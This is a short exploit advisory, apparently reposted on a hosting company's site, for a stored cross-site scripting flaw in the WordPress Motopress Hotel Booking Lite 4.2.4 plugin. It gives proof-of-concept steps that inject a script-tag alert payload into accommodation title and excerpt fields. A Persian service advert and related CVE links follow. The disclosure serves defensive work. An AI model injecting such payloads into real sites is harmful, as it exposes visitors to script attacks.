WordPress Motopress Hotel Booking Lite 4.2.4 Cross Site Scripting

WordPress Motopress Hotel Booking Lite 4.2.4 Cross Site Scripting
Posted Jun 10, 2022
Authored by Sanjay Singh
WordPress Motopress Hotel Booking Lite plugin version 4.2.4 suffers from a persistent cross site scripting vulnerability.
tags | exploit, xss
SHA-256 | 5cc44d045b16ad7ccdd88a107e648c4c1da49cc26d0a844d7168e4d5f80ea2b0
Download | Favorite | View
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2022-06-05
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP
###########################################################################
PoC:

1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
2. Click on “Add Accommodation Type”.
3. Add title payload= “><script>alert(“XSS”)</script>
4. Excerpt input payload “><script>alert(“XSS”)</script>
5. Click publish.
6. Visit http://localhost/accommodations/
7. XSS payload execute.

 

آسیب‌پذیری‌های جدید و وصله‌های امنیتی به‌صورت مداوم منتشر می‌شوند و عدم بروزرسانی به‌موقع می‌تواند امنیت سرویس‌های حیاتی را به خطر بیندازد. خدمات مدیریت و پشتیبانی سرور آفاق هاستینگ شامل پایش امنیتی، بروزرسانی نرم‌افزارها، نصب Patchهای امنیتی و سخت‌سازی سرورها است.

خدمات مدیریت و امنیت سرور

نوشته های مشابه

CVE-2026-54421 – OpenStack Ironic Information Disclosure

CVE-2026-54420 – LiteSpeed cPanel Plugin Symlink Privilege Escalation

CVE-2026-12175 – CodeAstro Student Attendance Management System createStudents.php sql injection

CVE-2026-12176 – SourceCodester CET Automated Grading System with AI Predictive Analytics index.php cross site scripting